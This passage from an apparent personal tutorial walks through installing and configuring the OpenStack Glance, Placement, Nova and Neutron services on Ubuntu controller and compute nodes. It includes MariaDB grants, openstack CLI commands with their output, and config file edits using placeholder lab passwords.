MariaDB [(none)]> grant all privileges on glance.* to 'glance'@'%' identified by 'password123';
Query OK, 0 rows affected (0.001 sec)

Now we need to make the glance user in OpenStack. To do this, we need to become the admin user, so source the admin-openrc file:

$ . admin-openrc
$ openstack user create --domain default --password-prompt glance
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field               | Value                            |
+---------------------+----------------------------------+
| domain_id           | default                          |
| enabled             | True                             |
| id                  | 7238c0c8862d4a63b95143e6a42d683b |
| name                | glance                           |
| options             | {}                               |
| password_expires_at | None                             |
+---------------------+----------------------------------+

Next, we need to add the glance user to the admin role of the services project:

$ openstack role add --project service --user glance admin

Now we need to define the service to add, and set up the endpoints:

$ openstack service create --name glance --description "OpenStack Image" image
+-------------+----------------------------------+
| Field       | Value                            |
+-------------+----------------------------------+
| description | OpenStack Image                  |
| enabled     | True                             |
| id          | 062afb3d1c4345c89d808548c2ec53f9 |
| name        | glance                           |
| type        | image                            |
+-------------+----------------------------------+

We can set up our endpoints with:

$ openstack endpoint create --region RegionOne image public http://controller:9292
+--------------+----------------------------------+
| Field        | Value                            |
+--------------+----------------------------------+
| enabled      | True                             |
| id           | 31b50e9589e74c9b839091f3a5e41688 |
| interface    | public                           |
| region       | RegionOne                        |
| region_id    | RegionOne                        |
| service_id   | 062afb3d1c4345c89d808548c2ec53f9 |
| service_name | glance                           |
| service_type | image                            |
| url          | http://controller:9292           |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne image internal http://controller:9292
+--------------+----------------------------------+
| Field        | Value                            |
+--------------+----------------------------------+
| enabled      | True                             |
| id           | ba685939d6344808828a6cb6a5426dee |
| interface    | internal                         |
| region       | RegionOne                        |
| region_id    | RegionOne                        |
| service_id   | 062afb3d1c4345c89d808548c2ec53f9 |
| service_name | glance                           |
| service_type | image                            |
| url          | http://controller:9292           |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne image admin http://controller:9292
+--------------+----------------------------------+
| Field        | Value                            |
+--------------+----------------------------------+
| enabled      | True                             |
| id           | 53dcf790c16d4275a1ddf52556eccbed |
| interface    | admin                            |
| region       | RegionOne                        |
| region_id    | RegionOne                        |
| service_id   | 062afb3d1c4345c89d808548c2ec53f9 |
| service_name | glance                           |
| service_type | image                            |
| url          | http://controller:9292           |
+--------------+----------------------------------+

From the URL, we can see that glance will use the 9292 port.

Now that the endpoint is created, we can install the glance package:

$ sudo apt install glance

Just like keystone, we need to edit the API file to enter the credentials glance will use to access its database.

Mine already has sqlite configured, so comment it out and add:

$ sudo vim /etc/glance/glance-api.conf
[database]
#connection = sqlite:////var/lib/glance/glance.sqlite
#backend = sqlalchemy
connection = mysql+pymysql://glance:password123@controller/glance

Next, we need to modify the [keystone_authtoken] sections:

[keystone_authtoken]
www_authenticate_uri = http://controller:5000
auth_url = http://controller:5000
memcached_servers = controller:11211
auth_type = password
project_domain_name = Default
user_domain_name = Default
project_name = service
username = glance
password = openstack

A small edit for [paste_deploy]:

[paste_deploy]
flavor = keystone

Another edit for [glance_store] to say we will use the file system to store our images:

[glance_store]
stores = file,http
default_store = file
filesystem_store_datadir = /var/lib/glance/images/

Finally, save and exit your editor.

We can populate the database with:

$ sudo -s
# su -s /bin/sh -c "glance-manage db_sync" glance

There is going to be a lot of scary output, but you can ignore it. It is mostly statements saying that database upgrade completed successfully across any older glance versions.

From there, we can restart the glance service to reload the config:

$ sudo systemctl restart glance-api

Verifying that Glance was Installed Correctly

All the OpenStack tutorials seem to use Cirros to their deployments, so we will go see what all the fuss is about.

Source the admin creds since we will need administrative permissions:

$ . admin-openrc

Download the ISO image:

$ wget http://download.cirros-cloud.net/0.4.0/cirros-0.4.0-x86_64-disk.img

Woah! Its only 12.13 megabytes! That’s crazy! Maybe its popular since its small.

We can upload the image to glance with the following command:

$ openstack image create --file cirros-0.4.0-x86_64-disk.img --disk-format \
qcow2 --container-format bare --public cirros
+------------------+------------------------------------------------------+
| Field            | Value                                                |
+------------------+------------------------------------------------------+
| checksum         | 443b7623e27ecf03dc9e01ee93f67afe                     |
| container_format | bare                                                 |
| created_at       | 2020-01-27T04:17:35Z                                 |
| disk_format      | qcow2                                                |
| file             | /v2/images/5ad293f2-1d07-44ae-8a23-19d619885a3b/file |
| id               | 5ad293f2-1d07-44ae-8a23-19d619885a3b                 |
| min_disk         | 0                                                    |
| min_ram          | 0                                                    |
| name             | cirros                                               |
| owner            | a45f9c52c6964c5da7585f5c8a70fdc7                     |
| properties       | os_hash_algo='sha512', os_hash_value='6513f21e44aa3d |
|                  | a349f248188a44bc304a3653a04122d8fb4535423c8e1d14cd6a |
|                  | 153f735bb0982e2161b5b5186106570c17a9e58b64dd39390617 |
|                  | cd5a350f78', os_hidden='False'                       |
| protected        | False                                                |
| schema           | /v2/schemas/image                                    |
| size             | 12716032                                             |
| status           | active                                               |
| tags             |                                                      |
| updated_at       | 2020-01-27T04:17:36Z                                 |
| virtual_size     | None                                                 |
| visibility       | public                                               |
+------------------+------------------------------------------------------+

We can check to see if it was imported correctly with:

$ openstack image list
+--------------------------------------+--------+--------+
| ID                                   | Name   | Status |
+--------------------------------------+--------+--------+
| 5ad293f2-1d07-44ae-8a23-19d619885a3b | cirros | active |
+--------------------------------------+--------+--------+

That’s it! We have Glance installed and configured now.

Installing Placement, the Resource Tracking Service

Placement allows OpenStack services to track resources within themselves, and when seeing how many resource they have left to consume, you can sets traits about those resources, such as if they have any machines with a SSD, or a SR_IOV network capable NIC, for example.

Placement used to be a part of Nova, but it was split out in the Stein release, so we need to go ahead and install it before we can install Nova.

I’m going to be following the Placement Install Documentation

Setting Up the Database On the Controller

Placement has its own database, so let’s go ahead and make one:

$ sudo mysql
MariaDB [(none)]> CREATE DATABASE placement;
Query OK, 1 row affected (0.001 sec)
MariaDB [(none)]> GRANT ALL PRIVILEGES ON placement.* TO 'placement'@'localhost' \
  IDENTIFIED BY 'password123';
Query OK, 0 rows affected (0.000 sec)
MariaDB [(none)]> GRANT ALL PRIVILEGES ON placement.* TO 'placement'@'%' \
  IDENTIFIED BY 'password123';
Query OK, 0 rows affected (0.000 sec)

Creating a User and the Endpoints

Let’s make a user for placement and add it to the admin role:

$ openstack user create --domain default --password-prompt placement
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field               | Value                            |
+---------------------+----------------------------------+
| domain_id           | default                          |
| enabled             | True                             |
| id                  | aca47b0613d443118363f40e59b4870d |
| name                | placement                        |
| options             | {}                               |
| password_expires_at | None                             |
+---------------------+----------------------------------+
$ openstack role add --project service --user placement admin

We can then create the Placement service and set up its endpoints:

$ openstack service create --name placement --description "Placement API" placement
+-------------+----------------------------------+
| Field       | Value                            |
+-------------+----------------------------------+
| description | Placement API                    |
| enabled     | True                             |
| id          | b1c3c8a8441d456a9c8ac34c668e39f6 |
| name        | placement                        |
| type        | placement                        |
+-------------+----------------------------------+

Making the public, internal and admin endpoints:

$ openstack endpoint create --region RegionOne placement public http://controller:8778
+--------------+----------------------------------+
| Field        | Value                            |
+--------------+----------------------------------+
| enabled      | True                             |
| id           | b018157a7c2b46da8aa8d99d2477cc54 |
| interface    | public                           |
| region       | RegionOne                        |
| region_id    | RegionOne                        |
| service_id   | b1c3c8a8441d456a9c8ac34c668e39f6 |
| service_name | placement                        |
| service_type | placement                        |
| url          | http://controller:8778           |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne placement internal http://controller:8778
+--------------+----------------------------------+
| Field        | Value                            |
+--------------+----------------------------------+
| enabled      | True                             |
| id           | 4aa4ff0b45fc48ae8f456fcf40ed7e8e |
| interface    | internal                         |
| region       | RegionOne                        |
| region_id    | RegionOne                        |
| service_id   | b1c3c8a8441d456a9c8ac34c668e39f6 |
| service_name | placement                        |
| service_type | placement                        |
| url          | http://controller:8778           |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne placement admin http://controller:8778
+--------------+----------------------------------+
| Field        | Value                            |
+--------------+----------------------------------+
| enabled      | True                             |
| id           | d475a4976eb34f6d9619dc72e4591736 |
| interface    | admin                            |
| region       | RegionOne                        |
| region_id    | RegionOne                        |
| service_id   | b1c3c8a8441d456a9c8ac34c668e39f6 |
| service_name | placement                        |
| service_type | placement                        |
| url          | http://controller:8778           |
+--------------+----------------------------------+

Installing and Configuring the Placement Packages

We can install placement with:

$ sudo apt install placement-api

From there, we can enable access to its database by editing its configuration file. Comment out the sqlite connection and add our mysql connection:

$ sudo vim /etc/placement/placement.conf
[placement_database]
#connection = sqlite:////var/lib/placement/placement.sqlite
connection = mysql+pymysql://placement:password123@controller/placement

Next head to the [api] and [keystone_authentication] sections and add the following:

[api]
auth_strategy = keystone

[keystone_authtoken]
auth_url = http://controller:5000/v3
memcached_servers = controller:11211
auth_type = password
project_domain_name = Default
user_domain_name = Default
project_name = service
username = placement
password = openstack

Note the password is the same as the one you used when you created the placement user earlier.

From there, we can populate the database with:

$ sudo -s
# su -s /bin/sh -c "placement-manage db sync" placement
# exit
$ sudo systemctl restart apache2

Verify that Placement Works

The osc-placement plugin allows us to query the placement API for its internal data, so let’s install it and give it a go:

$ sudo apt install python3-osc-placement

Once that is done, we can query the placement API with:

$ openstack --os-placement-api-version 1.2 resource class list --sort-column name
+----------------------------+
| name                       |
+----------------------------+
| DISK_GB                    |
| FPGA                       |
| IPV4_ADDRESS               |
| MEMORY_MB                  |
| MEM_ENCRYPTION_CONTEXT     |
| NET_BW_EGR_KILOBIT_PER_SEC |
| NET_BW_IGR_KILOBIT_PER_SEC |
| NUMA_CORE                  |
| NUMA_MEMORY_MB             |
| NUMA_SOCKET                |
| NUMA_THREAD                |
| PCI_DEVICE                 |
| PCPU                       |
| PGPU                       |
| SRIOV_NET_VF               |
| VCPU                       |
| VGPU                       |
| VGPU_DISPLAY_HEAD          |
+----------------------------+

It seems like it is working. Great!

Installing Nova, the Compute Service

Nova is the compute service for OpenStack. It is responsible for taking requests to provision a virtual machine, deciding on what compute host the instance will be launched by looking at resources available in the pool, and interacting with the underlying hypervisor to create and manage the virtual machine.

Nova supports many different hypervisors, and in this deployment, we will have a single compute node which uses QEMU / KVM.

I’m going to be following the Nova Controller Install Documentation.

Setting up the Databases, Services and Endpoints for Nova

We need to configure Nova services on the controller and the compute node, so we will begin by setting up some databases.

On the controller, open up the mysql monitor, and make databases for nova_api, nova and nova_cell0.

$ sudo mysql
MariaDB [(none)]> CREATE DATABASE nova_api;
Query OK, 1 row affected (0.001 sec)

MariaDB [(none)]> CREATE DATABASE nova;
Query OK, 1 row affected (0.000 sec)

MariaDB [(none)]> CREATE DATABASE nova_cell0;
Query OK, 1 row affected (0.000 sec)

As usual, we also need to grant some privileges:

MariaDB [(none)]> GRANT ALL PRIVILEGES ON nova_api.* TO 'nova'@'localhost' \
  IDENTIFIED BY 'password123';
MariaDB [(none)]> GRANT ALL PRIVILEGES ON nova_api.* TO 'nova'@'%' \
  IDENTIFIED BY 'password123';

MariaDB [(none)]> GRANT ALL PRIVILEGES ON nova.* TO 'nova'@'localhost' \
  IDENTIFIED BY 'password123';
MariaDB [(none)]> GRANT ALL PRIVILEGES ON nova.* TO 'nova'@'%' \
  IDENTIFIED BY 'password123';

MariaDB [(none)]> GRANT ALL PRIVILEGES ON nova_cell0.* TO 'nova'@'localhost' \
  IDENTIFIED BY 'password123';
MariaDB [(none)]> GRANT ALL PRIVILEGES ON nova_cell0.* TO 'nova'@'%' \
  IDENTIFIED BY 'password123';

Next, we need to create a nova user and add it to the admin role:

$ openstack user create --domain default --password-prompt nova
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field               | Value                            |
+---------------------+----------------------------------+
| domain_id           | default                          |
| enabled             | True                             |
| id                  | d6f43252051e43fe9cf7dbcc9b538751 |
| name                | nova                             |
| options             | {}                               |
| password_expires_at | None                             |
+---------------------+----------------------------------+
$ openstack role add --project service --user nova admin

From there we need to create the Nova service, and set up its endpoints:

$ openstack service create --name nova --description "OpenStack Compute" compute
+-------------+----------------------------------+
| Field       | Value                            |
+-------------+----------------------------------+
| description | OpenStack Compute                |
| enabled     | True                             |
| id          | 2364a25accfc4f8e9925009b152262f9 |
| name        | nova                             |
| type        | compute                          |
+-------------+----------------------------------+

Public, internal and admin endpoints:

$ openstack endpoint create --region RegionOne compute public http://controller:8774/v2.1
+--------------+----------------------------------+
| Field        | Value                            |
+--------------+----------------------------------+
| enabled      | True                             |
| id           | ed31df66c2ce45c981070395bf32eed4 |
| interface    | public                           |
| region       | RegionOne                        |
| region_id    | RegionOne                        |
| service_id   | 2364a25accfc4f8e9925009b152262f9 |
| service_name | nova                             |
| service_type | compute                          |
| url          | http://controller:8774/v2.1      |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne compute internal http://controller:8774/v2.1
+--------------+----------------------------------+
| Field        | Value                            |
+--------------+----------------------------------+
| enabled      | True                             |
| id           | 2429b84a9157442688867c80863373f9 |
| interface    | internal                         |
| region       | RegionOne                        |
| region_id    | RegionOne                        |
| service_id   | 2364a25accfc4f8e9925009b152262f9 |
| service_name | nova                             |
| service_type | compute                          |
| url          | http://controller:8774/v2.1      |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne compute admin http://controller:8774/v2.1
+--------------+----------------------------------+
| Field        | Value                            |
+--------------+----------------------------------+
| enabled      | True                             |
| id           | 27d6020c0c49436480febef5273a5b37 |
| interface    | admin                            |
| region       | RegionOne                        |
| region_id    | RegionOne                        |
| service_id   | 2364a25accfc4f8e9925009b152262f9 |
| service_name | nova                             |
| service_type | compute                          |
| url          | http://controller:8774/v2.1      |
+--------------+----------------------------------+

Installing Nova on the Controller

Time to actually get some packages installed to the controller:

$ sudo apt install nova-api nova-conductor nova-novncproxy nova-scheduler

From there, we will need to edit the configuration file and add database creds:

$ sudo vim /etc/nova/nova.conf
[api_database]
#connection = sqlite:////var/lib/nova/nova_api.sqlite
connection = mysql+pymysql://nova:password123@controller/nova_api

[database]
#connection = sqlite:////var/lib/nova/nova.sqlite
connection = mysql+pymysql://nova:password123@controller/nova

Then in the [DEFAULT] section, add:

[DEFAULT]
...
transport_url = rabbit://openstack:password123@controller:5672/
my_ip = 10.0.0.11
use_neutron = true
firewall_driver = nova.virt.firewall.NoopFirewallDriver

This sets rabbitmq as our messaging queue, and enables Neutron for networking.

Let’s set up Keystone authentication now:

[api]
auth_strategy = keystone

[keystone_authtoken]
www_authenticate_uri = http://controller:5000/
auth_url = http://controller:5000/
memcached_servers = controller:11211
auth_type = password
project_domain_name = Default
user_domain_name = Default
project_name = service
username = nova
password = openstack

While we are at it, set up Placement authentication:

[placement]
region_name = RegionOne
project_domain_name = Default
project_name = service
auth_type = password
user_domain_name = Default
auth_url = http://controller:5000/v3
username = placement
password = openstack

Only some more small changes left now. Lets configure the VNC proxy and glance:

[vnc]
enabled = true
server_listen = $my_ip
server_proxyclient_address = $my_ip

[glance]
api_servers = http://controller:9292

[oslo_concurrency]
lock_path = /var/lib/nova/tmp

Finally, we can populate the database with:

$ sudo -s
# su -s /bin/sh -c "nova-manage api_db sync" nova
# su -s /bin/sh -c "nova-manage cell_v2 map_cell0" nova
# su -s /bin/sh -c "nova-manage cell_v2 create_cell --name=cell1 --verbose" nova
95c6eb23-8e22-43d0-b833-2c9c1758f4a6
# su -s /bin/sh -c "nova-manage db sync" nova

We can see if the two nova cell0 and cell1 cells are registered:

# su -s /bin/sh -c "nova-manage cell_v2 list_cells" nova
+-------+--------------------------------------+------------------------------------------+-------------------------------------------------+----------+
|  Name |                 UUID                 |              Transport URL               |               Database Connection               | Disabled |
+-------+--------------------------------------+------------------------------------------+-------------------------------------------------+----------+
| cell0 | 00000000-0000-0000-0000-000000000000 |                  none:/                  | mysql+pymysql://nova:****@controller/nova_cell0 |  False   |
| cell1 | 95c6eb23-8e22-43d0-b833-2c9c1758f4a6 | rabbit://openstack:****@controller:5672/ |    mysql+pymysql://nova:****@controller/nova    |  False   |
+-------+--------------------------------------+------------------------------------------+-------------------------------------------------+----------+

If everything went smoothly, We can finalise the install by restarting all the nova services:

$ sudo systemctl restart nova-api
$ sudo systemctl restart nova-scheduler
$ sudo systemctl restart nova-conductor
$ sudo systemctl restart nova-novncproxy

Installing Nova to the Compute Host

Now we have Nova all set up on the controller, we need to get things running on the compute host.

I’m going to be following the Nova Compute Documentation.

We can install the nova-compute package with:

$ sudo apt install nova-compute

After that, we will need to edit the nova configuration file:

$ sudo vim /etc/nova/nova.conf

In the [DEFAULT] section, add rabbitmq creds as well as some other options for Neutron networking:

[DEFAULT]
transport_url = rabbit://openstack:password123@controller
my_ip = 10.0.0.21
use_neutron = true
firewall_driver = nova.virt.firewall.NoopFirewallDriver

Let’s set up Keystone authentication:

[api]
auth_strategy = keystone

[keystone_authtoken]
www_authenticate_uri = http://controller:5000/
auth_url = http://controller:5000/
memcached_servers = controller:11211
auth_type = password
project_domain_name = Default
user_domain_name = Default
project_name = service
username = nova
password = openstack

While we are at it, Placement authentication:

[placement]
region_name = RegionOne
project_domain_name = Default
project_name = service
auth_type = password
user_domain_name = Default
auth_url = http://controller:5000/v3
username = placement
password = openstack

Next we can configure Glance, and the lockfile:

[glance]
api_servers = http://controller:9292

[oslo_concurrency]
lock_path = /var/lib/nova/tmp

Finally, we need configure the VNC proxy:

[vnc]
enabled = true
server_listen = 0.0.0.0
server_proxyclient_address = $my_ip
novncproxy_base_url = http://controller:6080/vnc_auto.html

For some virtual machines, we need to determine if it supports the virtualisation extensions shipped in modern processors.

If you run:

$ egrep -c '(vmx|svm)' /proc/cpuinfo
1

You can see if the compute host supports these extensions. Mine returns 1, which means I am either lucky or I have a bug, but anyway, my compute machine supports hardware acceleration. If you get value of zero, you will need to add the following to /etc/nova/nova-compute.conf:

$ sudo vim /etc/nova/nova-compute.conf
[libvirt]
virt_type = qemu

I’m not doing this on my install, since my compute machine supports vmx.

When we are all done, we can finalise the install by restarting the nova-compute service:

$ sudo systemctl restart nova-compute

Discovering the Compute Node and Adding it to the Controller

We are nearly done installing Nova, I promise. We need to go back to the controller and discover the newly created compute host.

We need to be an admin for these tasks, so source the creds:

$ . admin-openrc

We can ensure we can see the compute host and its nova-compute service by running:

$ openstack compute service list
+----+----------------+------------+----------+---------+-------+----------------------------+
| ID | Binary         | Host       | Zone     | Status  | State | Updated At                 |
+----+----------------+------------+----------+---------+-------+----------------------------+
|  3 | nova-scheduler | controller | internal | enabled | up    | 2020-01-28T00:22:25.000000 |
|  4 | nova-conductor | controller | internal | enabled | up    | 2020-01-28T00:22:30.000000 |
|  5 | nova-compute   | compute    | nova     | enabled | up    | 2020-01-28T00:22:32.000000 |
+----+----------------+------------+----------+---------+-------+----------------------------+

We see the compute host, next to the controller host. Great. Let’s enlist this nova-compute service.

# su -s /bin/sh -c "nova-manage cell_v2 discover_hosts --verbose" nova
Found 2 cell mappings.
Skipping cell0 since it does not contain hosts.
Getting computes from cell 'cell1': 95c6eb23-8e22-43d0-b833-2c9c1758f4a6
Checking host mapping for compute host 'compute': 3098b6f9-5ea0-4085-838e-a269358bf8fb
Creating host mapping for compute host 'compute': 3098b6f9-5ea0-4085-838e-a269358bf8fb
Found 1 unmapped computes in cell: 95c6eb23-8e22-43d0-b833-2c9c1758f4a6

Each time we want to add a compute host, we need to run the above command.

We can also see a list of all currently installed and configured services by querying the catalogue:

$ openstack catalog list
+-----------+-----------+-----------------------------------------+
| Name      | Type      | Endpoints                               |
+-----------+-----------+-----------------------------------------+
| glance    | image     | RegionOne                               |
|           |           |   public: http://controller:9292        |
|           |           | RegionOne                               |
|           |           |   admin: http://controller:9292         |
|           |           | RegionOne                               |
|           |           |   internal: http://controller:9292      |
|           |           |                                         |
| nova      | compute   | RegionOne                               |
|           |           |   internal: http://controller:8774/v2.1 |
|           |           | RegionOne                               |
|           |           |   admin: http://controller:8774/v2.1    |
|           |           | RegionOne                               |
|           |           |   public: http://controller:8774/v2.1   |
|           |           |                                         |
| placement | placement | RegionOne                               |
|           |           |   internal: http://controller:8778      |
|           |           | RegionOne                               |
|           |           |   public: http://controller:8778        |
|           |           | RegionOne                               |
|           |           |   admin: http://controller:8778         |
|           |           |                                         |
| keystone  | identity  | RegionOne                               |
|           |           |   public: http://controller:5000/v3/    |
|           |           | RegionOne                               |
|           |           |   internal: http://controller:5000/v3/  |
|           |           | RegionOne                               |
|           |           |   admin: http://controller:5000/v3/     |
|           |           |                                         |
+-----------+-----------+-----------------------------------------+

We currently have keystone, glance, placement and nova configured, and we can see their endpoints.

Installing Neutron, the Networking Service

Neutron is the networking service for OpenStack. Neutron leverages built in Linux networking functions through plugins and sub-services to provide virtual networking to instances created by Nova.

I’m going to be following the Installation Documentation for Ubuntu.

Setting up the Database and Service Accounts

For each OpenStack service we set up, we have to create a database, grant privileges, and create service accounts. Neutron is no different. Head to the controller node, and run:

$ sudo mysql
MariaDB [(none)]> CREATE DATABASE neutron;
Query OK, 1 row affected (0.001 sec)

This makes the Neturon database. Let’s set up privileges:

MariaDB [(none)]> GRANT ALL PRIVILEGES ON neutron.* TO 'neutron'@'localhost' \
  IDENTIFIED BY 'password123';
Query OK, 1 row affected (0.001 sec)
MariaDB [(none)]> GRANT ALL PRIVILEGES ON neutron.* TO 'neutron'@'%' \
  IDENTIFIED BY 'password123';
Query OK, 1 row affected (0.001 sec)

From there, lets create some users and to set up the service:

$ . admin-openrc 
$ openstack user create --domain default --password-prompt neutron
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field               | Value                            |
+---------------------+----------------------------------+
| domain_id           | default                          |
| enabled             | True                             |
| id                  | ab6782079b3146eaa05d37e65e23cb43 |
| name                | neutron                          |
| options             | {}                               |
| password_expires_at | None                             |
+---------------------+----------------------------------+
$ openstack role add --project service --user neutron admin

Let’s set up the service and the endpoints:

$ openstack service create --name neutron --description "OpenStack Networking" network
+-------------+----------------------------------+
| Field       | Value                            |
+-------------+----------------------------------+
| description | OpenStack Networking             |
| enabled     | True                             |
| id          | 791b51052a5546a18f34b0d88b1ad55f |
| name        | neutron                          |
| type        | network                          |
+-------------+----------------------------------+

For the endpoints:

$ openstack endpoint create --region RegionOne network public http://controller:9696
+--------------+----------------------------------+
| Field        | Value                            |
+--------------+----------------------------------+
| enabled      | True                             |
| id           | 02eaa3bda2c14776b78c219869e21c9f |
| interface    | public                           |
| region       | RegionOne                        |
| region_id    | RegionOne                        |
| service_id   | 791b51052a5546a18f34b0d88b1ad55f |
| service_name | neutron                          |
| service_type | network                          |
| url          | http://controller:9696           |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne network internal http://controller:9696
+--------------+----------------------------------+
| Field        | Value                            |
+--------------+----------------------------------+
| enabled      | True                             |
| id           | 3b676e8beaaa4a5cbf90a4fc2fe4690f |
| interface    | internal                         |
| region       | RegionOne                        |
| region_id    | RegionOne                        |
| service_id   | 791b51052a5546a18f34b0d88b1ad55f |
| service_name | neutron                          |
| service_type | network                          |
| url          | http://controller:9696           |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne network admin http://controller:9696
+--------------+----------------------------------+
| Field        | Value                            |
+--------------+----------------------------------+
| enabled      | True                             |
| id           | dcd64f08a346410aa1af89fdd3405406 |
| interface    | admin                            |
| region       | RegionOne                        |
| region_id    | RegionOne                        |
| service_id   | 791b51052a5546a18f34b0d88b1ad55f |
| service_name | neutron                          |
| service_type | network                          |
| url          | http://controller:9696           |
+--------------+----------------------------------+

Installing Neutron to the Controller

Let’s get some packages installed:

$ sudo apt install neutron-server neutron-plugin-ml2 neutron-linuxbridge-agent \
neutron-dhcp-agent neutron-metadata-agent

Once everything is installed, we can edit the Neutron configuration file to add database creds and change some basic settings.

$ sudo vim /etc/neutron/neutron.conf
[database]
#connection = sqlite:////var/lib/neutron/neutron.sqlite
connection = mysql+pymysql://neutron:password123@controller/neutron

Add the rabbitmq settings, and we also need to define the authentication scheme:

[DEFAULT]
core_plugin = ml2
service_plugins =
transport_url = rabbit://openstack:password123@controller
auth_strategy = keystone

From there, we need to set up Keystone accounts:

[keystone_authtoken]
www_authenticate_uri = http://controller:5000
auth_url = http://controller:5000
memcached_servers = controller:11211
auth_type = password
project_domain_name = default
user_domain_name = default
project_name = service
username = neutron
password = openstack

As always, make sure to use the correct password for the neutron account.

Since we will be using Neutron with Nova, we will configure Neutron to notify Nova on any port status or configuration changes:

[DEFAULT]
# ...
notify_nova_on_port_status_changes = true
notify_nova_on_port_data_changes = true

Now, lets add the Nova account information in:

[nova]
auth_url = http://controller:5000
auth_type = password
project_domain_name = default
user_domain_name = default
region_name = RegionOne
project_name = service
username = nova
password = openstack

We also need to set a lockfile path:

[oslo_concurrency]
lock_path = /var/lib/neutron/tmp

Configuring the ML2 Networking Plugin

Our deployment will use the Modular Layer 2 plugin, since it uses underlying Linux bridges to make layer 2 devices, such as bridges and switches in the virtual network for instances.

Let’s edit some configuration:

$ sudo vim /etc/neutron/plugins/ml2/ml2_conf.ini

[ml2]
type_drivers = flat,vlan
tenant_network_types =
mechanism_drivers = linuxbridge
extension_drivers = port_security

[ml2_type_flat]
flat_networks = provider

[securitygroup]
enable_ipset = true

This sets things up such that the provider network is a flat network provided by Linux bridges, and tenants cannot create their own networks.

Configuring the Linux Bridge Agent

When configuring the Linux bridge agent, we need to know what interface our provider network is on. So go back to /etc/netplan/50-cloud-init.yaml, and we can see that our provider network is enp3s0, since it has the 203.0.113.11 IP address.

        enp3s0:
            dhcp4: true
            addresses: [203.0.113.11/24]

Great. From there, lets configure the bridge agent:

[linux_bridge]
physical_interface_mappings = provider:enp3s0

[vxlan]
enable_vxlan = false

[securitygroup]
enable_security_group = true
firewall_driver = neutron.agent.linux.iptables_firewall.IptablesFirewallDriver

We also need to check the br_netfilter kernel module is loaded, since that is what implements bridges:

$ lsmod | grep br_netfilter
br_netfilter           28672  0
bridge                176128  1 br_netfilter

br_netfilter is already loaded for me.

We also need to make sure the following sysctl values are set, but they will be on any Ubuntu release:

$ sysctl net.bridge.bridge-nf-call-iptables 
net.bridge.bridge-nf-call-iptables = 1
$ sysctl net.bridge.bridge-nf-call-ip6tables
net.bridge.bridge-nf-call-ip6tables = 1

Configuring the DHCP Agent

We want our virtual network to provide a DHCP lease to our instances, so we need to configure the DHCP agent:

$ sudo vim /etc/neutron/dhcp_agent.ini
[DEFAULT]
interface_driver = linuxbridge
dhcp_driver = neutron.agent.linux.dhcp.Dnsmasq
enable_isolated_metadata = true

Configuring the Metadata Agent

The metadata agent is quite an important agent - it provides run time configuration information to instances, things that can be consumed by services like cloud-init, such as SSH keys and autostart scripts.

The metadata agent requires a shared secret, so we can generate one with openssl:

$ openssl rand -hex 10
9de15dd7b515ab242d20

This generates us a 10 byte long random secret, which we can use in our configuration:

$ sudo vim /etc/neutron/metadata_agent.ini
[DEFAULT]
nova_metadata_host = controller
metadata_proxy_shared_secret = 9de15dd7b515ab242d20

Configure Nova to use Neutron for Networking

Time to add some creds to Nova so it can communicate with Neutron:

$ sudo vim /etc/nova/nova.conf

[neutron]
auth_url = http://controller:5000
auth_type = password
project_domain_name = default
user_domain_name = default
region_name = RegionOne
project_name = service
username = neutron
password = openstack
service_metadata_proxy = true
metadata_proxy_shared_secret = 9de15dd7b515ab242d20

Finalise by Populating Database and Restarting Services

We can populate the database on the controller with:

$ sudo -s
# su -s /bin/sh -c "neutron-db-manage --config-file /etc/neutron/neutron.conf \
  --config-file /etc/neutron/plugins/ml2/ml2_conf.ini upgrade head" neutron

Restart the Nova service:

$ sudo systemctl restart nova-api

Restart the Neutron services:

$ sudo systemctl restart neutron-server
$ sudo systemctl restart neutron-linuxbridge-agent
$ sudo systemctl restart neutron-dhcp-agent
$ sudo systemctl restart neutron-metadata-agent

Installing Neutron to the Compute Machine

Most of the heavy lifting when installing Neutron was setting up the controller, and like nova-compute, installing neutron to the compute machine seems straightforward.

Let’s install the package:

$ sudo apt install neutron-linuxbridge-agent

And start some configuration. Note, we need to comment out the database section since compute nodes do not directly connect to the Neutron database.

$ sudo vim /etc/neutron/neutron.conf
[database]
#connection = sqlite:////var/lib/neutron/neutron.sqlite

[DEFAULT]
core_plugin = ml2
transport_url = rabbit://openstack:password123@controller
auth_strategy = keystone

Let’s set up Keystone:

[keystone_authtoken]
www_authenticate_uri = http://controller:5000
auth_url = http://controller:5000
memcached_servers = controller:11211
auth_type = password
project_domain_name = default
user_domain_name = default
project_name = service
username = neutron
password = openstack

And configure the lock path:

[oslo_concurrency]
lock_path = /var/lib/neutron/tmp

Configure the Linux Bridge Agent in the Compute Machine

Similar to the controller, we need to tell Neutron the network interface we are using. Again, check /etc/netplan-50-cloud-init.yaml:

        enp3s0:
            dhcp4: true
            addresses: [203.0.113.21/24]

Mine says enp3s0 like last time.

[linux_bridge]
physical_interface_mappings = provider:enp3s0

[vxlan]
enable_vxlan = false

[securitygroup]
enable_security_group = true
firewall_driver = neutron.agent.linux.iptables_firewall.IptablesFirewallDriver

Again, we need to ensure the br_netfilter module is loaded:

$ lsmod | grep "br_netfilter"
br_netfilter           28672  0
bridge                176128  1 br_netfilter

And that the following sysctl entries are set to 1:

$ sysctl net.bridge.bridge-nf-call-iptables 
net.bridge.bridge-nf-call-iptables = 1
$ sysctl net.bridge.bridge-nf-call-ip6tables
net.bridge.bridge-nf-call-ip6tables = 1

Configure Nova to use Neutron for Networking on the Compute Machine

Some quick config to link Nova up with Neutron:

$ sudo vim /etc/nova/nova.conf

[neutron]
auth_url = http://controller:5000
auth_type = password
project_domain_name = default
user_domain_name = default
region_name = RegionOne
project_name = service
username = neutron
password = openstack

Restart Services

We need to restart both the Nova and Neutron services:

$ sudo systemctl restart nova-compute
$ sudo systemctl restart neutron-linuxbridge-agent

Verifying that Neutron was Installed Successfully

We can do a quick check to check the status of the Neutron services. Head back to the controller, and source the admin creds. From there run:

$ . admin-openrc
$ openstack network agent list
